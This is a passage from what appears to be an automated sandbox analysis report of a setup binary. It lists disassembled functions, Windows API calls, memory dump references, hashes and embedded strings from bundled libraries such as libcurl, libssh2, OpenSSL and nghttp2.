                          • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,00051887,?,?,00000000,?,00000000,00000007), ref: 0010E43D
                          Strings
                          • Server does not support RENAME, xrefs: 0010E4B9
                          • File already exists and SSH_FXP_RENAME_OVERWRITE not specified, xrefs: 0010E673
                          • Unable to send FXP_RENAME command, xrefs: 0010E661
                          • Operation Not Supported, xrefs: 0010E67A
                          • SFTP rename packet too short, xrefs: 0010E5F9
                          • SFTP Protocol Error, xrefs: 0010E63E
                          • Unable to allocate memory for FXP_RENAME packet, xrefs: 0010E66A
                          • Error waiting for FXP STATUS, xrefs: 0010E64F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: _time64
                          • String ID: Error waiting for FXP STATUS$File already exists and SSH_FXP_RENAME_OVERWRITE not specified$Operation Not Supported$SFTP Protocol Error$SFTP rename packet too short$Server does not support RENAME$Unable to allocate memory for FXP_RENAME packet$Unable to send FXP_RENAME command
                          • API String ID: 1670930206-3556387644
                          • Opcode ID: 0a24ac26f9c4d3e033cdcd03c0d000ac79281989ae290bb10513ee4489f17ac4
                          • Instruction ID: 03cb9201d0f400ba80ce0f1456f036e0eefe86caa66f0d9981e50bfa058efba3
                          • Opcode Fuzzy Hash: 0a24ac26f9c4d3e033cdcd03c0d000ac79281989ae290bb10513ee4489f17ac4
                          • Instruction Fuzzy Hash: 6571AFB1608304AFD7209F25EC85B6BBBE4AF51304F054D1DF9DA872E2E7B29914CB52
                          APIs
                          • CertGetCertificateContextProperty.CRYPT32(00000000,0000000B,00000000), ref: 0026238F
                          • CertGetCertificateContextProperty.CRYPT32(00000000,0000000B,00000000), ref: 002623C4
                          • GetLastError.KERNEL32 ref: 00262433
                            • Part of subcall function 00262240: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,0025F763,?,?,?,?,?), ref: 00262251
                            • Part of subcall function 00262240: WideCharToMultiByte.KERNEL32 ref: 00262284
                            • Part of subcall function 00262240: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000), ref: 002622BD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: ByteCertCertificateCharContextMultiPropertyWide$ErrorLastwcslen
                          • String ID: %lX$ERR_CAPI_error$Error code= 0x$capi_cert_get_fname$engines/e_capi.c$engines/e_capi_err.c
                          • API String ID: 3049598375-4146664032
                          • Opcode ID: a7b4992de0927a1d6476a2847345a48a6671f68fab0b47b787812f6a43ff7917
                          • Instruction ID: 5cf47544755004ec3cd5f26a97a810790c2644434391c8ba75f2a87dd1e308f4
                          • Opcode Fuzzy Hash: a7b4992de0927a1d6476a2847345a48a6671f68fab0b47b787812f6a43ff7917
                          • Instruction Fuzzy Hash: DE21E7A17507017BF3203765BC47F3B362ADB51B56F010034FE08A93D3EB968A2886E2
                          APIs
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00050794
                            • Part of subcall function 0010F340: _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,?,000500B0,?,?,00000000,00000000,?), ref: 0010F35D
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 0005356E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: strlen$_time64
                          • String ID: Bad file size (%lld)$Could not seek stream$Creating the dir/file failed: %s$Failed to read data$Unknown error in libssh2$Upload failed: %s (%lu/%d)$ssh error
                          • API String ID: 2413861649-3110757985
                          • Opcode ID: 83171b1694c7406e7c3d2601e47f559d9ff57d1ef316f5d9c968f5c184b5beb9
                          • Instruction ID: 25cfe97433ec358047de00043e450f7a1f16449b4f4f3ddc2a7d0f2a53e1aee1
                          • Opcode Fuzzy Hash: 83171b1694c7406e7c3d2601e47f559d9ff57d1ef316f5d9c968f5c184b5beb9
                          • Instruction Fuzzy Hash: 3CE1CEB5A047019BD715DF28C885BABB7E5BB88304F144638FC598B352DB71AE48CB92
                          APIs
                            • Part of subcall function 001FB4B0: GetEnvironmentVariableW.KERNEL32(OPENSSL_WIN32_UTF8,00000000,00000000,?,?,00000000,00000000,00000000,?,00207667,OPENSSL_MODULES), ref: 001FB4CA
                            • Part of subcall function 001FB4B0: GetACP.KERNEL32(?,?,00000000,00000000,00000000,?,00207667,OPENSSL_MODULES), ref: 001FB4D4
                            • Part of subcall function 001FB4B0: MultiByteToWideChar.KERNEL32(00000000,00000000,00207667,000000FF,00000000,00000000,?,?,00000000,00000000,00000000,?,00207667,OPENSSL_MODULES), ref: 001FB53B
                            • Part of subcall function 001FB4B0: MultiByteToWideChar.KERNEL32(00000000,00000000,00207667,000000FF,-00000008,00000000,?,?,?,00000000,00000000,00000000,?,00207667,OPENSSL_MODULES), ref: 001FB5A1
                            • Part of subcall function 001FB4B0: GetEnvironmentVariableW.KERNEL32(-00000008,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00207667,OPENSSL_MODULES), ref: 001FB5B4
                            • Part of subcall function 001FB4B0: GetEnvironmentVariableW.KERNEL32(?,-00000008,00000000,?,?,?,?,00000000,00000000,00000000,?,00207667,OPENSSL_MODULES), ref: 001FB648
                            • Part of subcall function 001FB4B0: WideCharToMultiByte.KERNEL32 ref: 001FB67F
                            • Part of subcall function 001FB4B0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(00207667,?,?,00000000,00000000,00000000,?,00207667,OPENSSL_MODULES), ref: 001FB504
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 0018A1F0
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 0018A20B
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,00000000,00000000), ref: 0018A25D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: ByteCharEnvironmentMultiVariableWide$strlen$getenvmemcpy
                          • String ID: %02x$OSSL_QFILTER$QLOGDIR$_%s.sqlog$client$server$ssl/quic/qlog.c
                          • API String ID: 2744062652-2540125403
                          • Opcode ID: 2b59895640769a8f42ed169ed7665a7860f6f2a65e53ca333292fb29dce136d3
                          • Instruction ID: 3ba57e4ecf5e8f18794d0c3911c5023c9afe998cd97bcf24178f05fa82d33bbe
                          • Opcode Fuzzy Hash: 2b59895640769a8f42ed169ed7665a7860f6f2a65e53ca333292fb29dce136d3
                          • Instruction Fuzzy Hash: 155108A5E043586FFB1076249C42B3B7BD96F91704F484439FE8987243F769EE148B92
                          APIs
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 0004284C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: strlen
                          • String ID: %s%s%s$Alt-svc connecting from [%s]%s:%d to [%s]%s:%d$No valid port number in connect to host string (%s)$Please URL encode %% as %%25, see RFC 6874.$url.c
                          • API String ID: 39653677-4104037097
                          • Opcode ID: 681d4cd223169d5122a2774527031d25b6759ea45a91140cdc0fbf103d5bcee8
                          • Instruction ID: daca9ce57afb74c7211c5b25fb45e13170c7c0b1a4b38a1baf0245e6598b6473
                          • Opcode Fuzzy Hash: 681d4cd223169d5122a2774527031d25b6759ea45a91140cdc0fbf103d5bcee8
                          • Instruction Fuzzy Hash: 42A134B0B043406BDB648E18D845B7A7BD6AF86354F88447CFC898B293E7719C61C796
                          APIs
                          • getpeername.WS2_32(?,?,00000080), ref: 0005A376
                          • WSAGetLastError.WS2_32 ref: 0005A380
                            • Part of subcall function 000278B0: closesocket.WS2_32(?), ref: 000278BB
                            • Part of subcall function 0005EF30: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000001,?,?), ref: 0005EF6F
                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0005A3D2
                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0005A3D6
                          Strings
                          • getpeername() failed with errno %d: %s, xrefs: 0005A3A0
                          • cf-socket.c, xrefs: 0005A2E9
                          • accepted_set(sock=%d, remote=%s port=%d), xrefs: 0005A488
                          • ssrem inet_ntop() failed with errno %d: %s, xrefs: 0005A3F4
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: _errno$ErrorLastclosesocketgetpeername
                          • String ID: accepted_set(sock=%d, remote=%s port=%d)$cf-socket.c$getpeername() failed with errno %d: %s$ssrem inet_ntop() failed with errno %d: %s
                          • API String ID: 1501154218-2965463112
                          • Opcode ID: 233b84d37aadd2a8a51ae1890c625c29c5687812682d09b1f93873d6e3a37b3a
                          • Instruction ID: 3c2248b1e061e29f35656e17382dab75a5c4e2be05f5e6cff49337dfad069930
                          • Opcode Fuzzy Hash: 233b84d37aadd2a8a51ae1890c625c29c5687812682d09b1f93873d6e3a37b3a
                          • Instruction Fuzzy Hash: 92510931904740AFD7619F28DC46BEB77F8AF82315F044518FD5C47252EB32A989CB92
                          APIs
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000001,?,0000000F), ref: 000CA5FC
                          • memmove.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,0000000F), ref: 000CA698
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 000CA6BF
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(i + 1 < blk->n,nghttp3_ksl.c,0000019B), ref: 000CA6EB
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(lblk->n + rblk->n < NGHTTP3_KSL_MAX_NBLK,nghttp3_ksl.c,000001A2), ref: 000CA700
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: _assertmemcpy$memmove
                          • String ID: i + 1 < blk->n$lblk->n + rblk->n < NGHTTP3_KSL_MAX_NBLK$nghttp3_ksl.c
                          • API String ID: 3463011695-2629231663
                          • Opcode ID: 93fc9695a8fe31fc0d90480b564af18f7f5e64133be173e5fd2202ada9e0cb13
                          • Instruction ID: bd43976383bf4dc2c71241b0a0301dfb292d5d0af4566774085e6627749f3921
                          • Opcode Fuzzy Hash: 93fc9695a8fe31fc0d90480b564af18f7f5e64133be173e5fd2202ada9e0cb13
                          • Instruction Fuzzy Hash: 9C415F757043049FC708DF18D886DAAB7E6FB99318F08C96DE8898B352E670ED11CB55
                          APIs
                          • CertGetCertificateContextProperty.CRYPT32(00000000,00000002,00000000), ref: 00262491
                          • CertGetCertificateContextProperty.CRYPT32(00000000,00000002,00000000), ref: 002624C6
                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,0025F5B4), ref: 00262529
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: CertCertificateContextProperty$ErrorLast
                          • String ID: %lX$ERR_CAPI_error$Error code= 0x$engines/e_capi.c$engines/e_capi_err.c
                          • API String ID: 2217977984-837018288
                          • Opcode ID: c4ca52bfe98e18d98aaa1d060232cd9eb099adcb4da5a53782ec17965c29c996
                          • Instruction ID: c9db70ff51abb6bd928ef988694c1630b6d58d245a9b27e99fa36e6ce18de204
                          • Opcode Fuzzy Hash: c4ca52bfe98e18d98aaa1d060232cd9eb099adcb4da5a53782ec17965c29c996
                          • Instruction Fuzzy Hash: 3811C8B1B9071477F2203771BC47F3B362ADB14B59F451020F908A92D3FA928A2486E2
                          APIs
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0((!session->server && session->pending_no_rfc7540_priorities != 1) || (session->server && !session_no_rfc7540_pri_no_fallback(session)),nghttp2_session.c,0000034E), ref: 000AA377
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(pri_spec->stream_id != stream->stream_id,nghttp2_session.c,0000034F), ref: 000AA507
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(dep_stream,nghttp2_session.c,00000377), ref: 000AA51C
                          Strings
                          • dep_stream, xrefs: 000AA517
                          • (!session->server && session->pending_no_rfc7540_priorities != 1) || (session->server && !session_no_rfc7540_pri_no_fallback(session)), xrefs: 000AA372
                          • nghttp2_session.c, xrefs: 000AA36D, 000AA4FD, 000AA512
                          • pri_spec->stream_id != stream->stream_id, xrefs: 000AA502
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: _assert
                          • String ID: (!session->server && session->pending_no_rfc7540_priorities != 1) || (session->server && !session_no_rfc7540_pri_no_fallback(session))$dep_stream$nghttp2_session.c$pri_spec->stream_id != stream->stream_id
                          • API String ID: 1222420520-1552295562
                          • Opcode ID: bc9f89b009e3c29ebafa7baa32a0ab31e82cf3de6499ba722f39d49b0fbc5bd9
                          • Instruction ID: 75e5e0cbca4997c2885d8614b2ff9f609623bb3d1832e2f0d20790e42bcf5be0
                          • Opcode Fuzzy Hash: bc9f89b009e3c29ebafa7baa32a0ab31e82cf3de6499ba722f39d49b0fbc5bd9
                          • Instruction Fuzzy Hash: 0CA10271A08385AFDB719A748C45BFB7BE46F87304F084429F889862C2E775E954CB63
                          APIs
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00072666
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00072699
                          • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 000726FB
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000018,?,?), ref: 0007273A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: strlen$_time64memcpy
                          • String ID: :%u$Shuffling %i addresses$hostip.c
                          • API String ID: 2198566249-1766712111
                          • Opcode ID: a363242e4a79b3ff708d051e902f6498f7c5fb149b919805ebda5ca60fbd18eb
                          • Instruction ID: 853e9f3bd66aada4537031bf48ee0308d19ce39c97c1d58ca06208daa52390cc
                          • Opcode Fuzzy Hash: a363242e4a79b3ff708d051e902f6498f7c5fb149b919805ebda5ca60fbd18eb
                          • Instruction Fuzzy Hash: 9EA1D075A047009FD775DF18D845BAAB7E5EF88304F18843DED8A87342E739E9118B85
                          APIs
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00022359
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00022465
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000224AB
                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000223EE
                            • Part of subcall function 00021A54: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00021A70
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
